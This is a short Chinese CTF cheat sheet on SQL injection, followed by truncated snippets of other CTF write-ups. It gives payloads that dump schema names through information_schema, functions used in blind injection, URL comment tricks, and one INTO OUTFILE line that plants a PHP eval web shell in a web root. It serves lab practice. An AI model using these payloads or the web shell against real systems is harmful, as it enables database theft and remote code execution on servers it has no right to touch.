CTF之SQL注入

2021-09-25 14:06:28 字數 758 閱讀 5890

github - audi-1/sqli-labs: sqli labs

爆庫名select database()

爆表名select group_concat(table_name) from information_schema.tables where table_schema=database()

爆列名select group_concat(column_name) from information_schema.columns where table_name=『表名』

sql常用函式

group_concat()

concat()

concat_ws()

database()

version()

char_length()

left( , )

ascii(str):返回字串str的最左面字元的ascii**值。

ord(str):同上,返回ascii碼

if(a,b,c) :a為條件,a為true,返回b,否則返回c,如if(1>2,1,0),返回0

寫入檔案

select 1,2,』<?php @eval($_post["cmd"]);?>』 into outfile 「c:\wamp\www\html\shell.php」

有待補充sql中的注釋

#

--空格

注意在url中可能忽略空格,可以使用--+

ctf題記錄之SQL注入

這是一道xctf平台上的upload題,我沒有想到它是個sql注入 0x01 開啟鏈結是乙個登陸介面,不管三七二十一先註冊登陸,是乙個檔案上傳的頁面,任意上傳檔案,發現只能傳jpg才能記錄下來。好像其他的都被過濾掉了。值得注意的是我們上傳的檔名都會顯示到頁面上,這個過程可能是經過資料庫查詢的,我們上...

CTF 簡單的sql注入之2

型別 web 攻擊 sql注入 一句話總結 id有回顯的sql注入 手工 測試發現過濾空格,用 代替空格 1 union select schema name from information schema.schemata where 1 1結果 web1 1 union select table...

SQL注入1(南郵CTF)

提示看原始碼 secure web login head if post user post pass if query user admin echo query user 看這個 if query user admin echo logged in flag 題目有兩個輸入框,乙個user乙個密...